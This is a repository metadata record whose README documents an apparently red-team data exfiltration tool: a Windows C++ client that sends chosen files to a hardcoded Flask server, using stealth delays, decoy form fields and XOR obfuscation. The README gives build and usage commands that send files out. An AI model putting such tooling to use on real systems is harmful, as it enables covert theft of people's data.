{"id":26100538,"url":"https://github.com/leshenkazevnoski/exfiltrationtool","last_synced_at":"2025-03-09T17:39:20.684Z","repository":{"id":281443226,"uuid":"945284297","full_name":"LeshenkaZevnoski/ExfiltrationTool","owner":"LeshenkaZevnoski","description":"Data exfiltration tool for penetration testing and red team engagement","archived":false,"fork":false,"pushed_at":"2025-03-09T05:02:38.000Z","size":2228,"stargazers_count":0,"open_issues_count":0,"forks_count":0,"subscribers_count":1,"default_branch":"master","last_synced_at":"2025-03-09T05:25:10.032Z","etag":null,"topics":["cpp","exfiltration","tool"],"latest_commit_sha":null,"homepage":"","language":"C++","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/LeshenkaZevnoski.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null}},"created_at":"2025-03-09T04:07:23.000Z","updated_at":"2025-03-09T05:02:41.000Z","dependencies_parsed_at":"2025-03-09T05:35:31.639Z","dependency_job_id":null,"html_url":"https://github.com/LeshenkaZevnoski/ExfiltrationTool","commit_stats":null,"previous_names":["leshenkazevnoski/exfiltrationtool"],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/LeshenkaZevnoski%2FExfiltrationTool","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/LeshenkaZevnoski%2FExfiltrationTool/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/LeshenkaZevnoski%2FExfiltrationTool/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/LeshenkaZevnoski%2FExfiltrationTool/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/LeshenkaZevnoski","download_url":"https://codeload.github.com/LeshenkaZevnoski/ExfiltrationTool/tar.gz/refs/heads/master","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":242729460,"owners_count":20175945,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["cpp","exfiltration","tool"],"created_at":"2025-03-09T17:39:19.580Z","updated_at":"2025-03-09T17:39:20.679Z","avatar_url":"https://github.com/LeshenkaZevnoski.png","language":"C++","funding_links":[],"categories":[],"sub_categories":[],"readme":"# File Exfiltration Tool\n\n## Overview\nThis project is to demonstrate a data exfiltration feature written in C++ with a Python-based server for a penetration testing engagement. This tool can also be intergrated into other malware funcitonalities. The tool allows you to exfiltrate files from a client machine to a remote server over HTTP, with options for chunking, delays, and type-specific processing. The tool supports various file types (e.g., `.txt`, `.png`, `.docx`, `.pdf`), with image files transferred without encryption for direct usability, while other types are XOR-encrypted for basic obfuscation.\n\n### Features:\n- File type detection and processing (e.g., no encryption for images).\n- Optional chunking to split large files into smaller pieces.\n- Optional random delays between chunks for stealth.\n- Base64 encoding for HTTP transmission.\n- Dummy form fields to mimic legitimate traffic.\n- Simple Python Flask server to receive and reassemble files.\n\n\u003e **Disclaimer:** Unauthorized use for malicious purposes is illegal and unethical. I hold no responsibility for any misuse.\n\n## Prerequisites\n\n### Client (C++)\n- **Operating System:** Windows (uses WinHTTP API).\n- **Compiler:** MSVC (e.g., `cl` via Visual Studio) or MinGW (e.g., `g++`).\n- **Libraries:** WinHTTP (included with Windows).\n\n### Server (Python)\n- **Operating System:** Any (tested on VM Windows/MacOS).\n- **Python:** 3.6+.\n- **Dependencies:** Flask (`pip install flask`).\n- **Network:** Server must be reachable on port 80 (configurable).\n\n## Setup\n\n### Client\n\n#### Clone the Repository:\n```bash\ngit clone https://github.com/yourusername/file-exfiltration-tool.git\ncd file-exfiltration-tool\n```\n\n#### Compile the C++ Code:\n\nUsing MSVC:\n```bash\ncl client.cpp /link winhttp.lib\n```\nUsing MinGW:\n```bash\ng++ client.cpp -o client.exe -lwinhttp\n```\n**Output:** `client.exe`.\n\n### Server\n\n#### Install Dependencies:\n```bash\npip install flask\n```\n\n#### Run the Server:\n![MacOS screenshot](Images/MacOS.png)\n\n1. Save the Python script as `app.py`.\n2. Start it on the target machine (e.g., `192.168.2.214`):\n   ```bash\n   python server.py\n   ```\n3. Ensure port `80` is open and the server is reachable.\n\n## Usage\n![VM Windows screenshot](Images/VM_Windows.png)\n\n### Client\nRun the compiled executable with the following syntax:\n```bash\nclient.exe \u003cfile_path\u003e [-c] [-d]\n```\n- `\u003cfile_path\u003e`: Path to the file to exfiltrate (e.g., `image.png`, `doc.docx`).\n- `-c`: Enable chunking (splits file into 1024-byte pieces).\n- `-d`: Enable random delays (1–5 seconds between chunks, requires `-c`).\n\n#### Examples:\nTransfer a PNG file as a single piece:\n```bash\nclient.exe image.png\n```\nTransfer a text file in chunks with delays:\n```bash\nclient.exe notes.txt -c -d\n```\n\n**Output:**\n- Logs bytes read, sent, and server response status.\n- Success message: `\"Data sent successfully to 192.168.2.214.\"`\n\n### Server\n- The server listens on `0.0.0.0:80` and saves received files as `exfiltrated_data.\u003cext\u003e` (e.g., `exfiltrated_data.png`).\n- Logs chunk reception and final file size.\n\n#### Example Output:\n```\nReceived chunk 1 of 3, size: 1368 bytes\nReceived chunk 2 of 3, size: 1368 bytes\nReceived chunk 3 of 3, size: 500 bytes\nFile fully received and saved as exfiltrated_data.png, size: 3236 bytes\n```\n\n## File Type Handling\n- **Images** (`.png`, `.jpg`, `.jpeg`, `.bmp`): Transferred unencrypted.\n- **Text** (`.txt`), **Office** (`.docx`, `.xlsx`), **PDF** (`.pdf`): XOR-encrypted with key `\"mysecretkey\"`.\n- **Other Types**: Default to XOR encryption, saved with `.bin` extension if no extension is detected.\n\n## Notes\n- **Server IP:** Hardcoded to `192.168.2.214:80`. Modify `server_host` and `server_path` in `client.cpp` for a different target.\n- **Chunk Size:** Fixed at `1024` bytes when chunking is enabled. Adjust `chunk_size` in `client.cpp` as needed.\n- **Security:** XOR encryption is basic and not secure for real-world use; consider stronger methods for production.\n\n## Troubleshooting\n- **Empty Output File:** Check client/server logs for size mismatches or errors (e.g., `\"WinHttpSendRequest failed: 12029\"` = server unreachable).\n- **Network Issues:** Ensure the server is running and reachable (`ping 192.168.2.214`, `telnet 192.168.2.214 80`).\n- **Corrupted Images:** Verify original file integrity; test without chunking (`client.exe image.png`).\n\n## Contributing\nFeel free to fork this repository and submit pull requests with improvements (e.g., stronger encryption, more file type processors, configuration options).\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fleshenkazevnoski%2Fexfiltrationtool","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fleshenkazevnoski%2Fexfiltrationtool","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fleshenkazevnoski%2Fexfiltrationtool/lists"}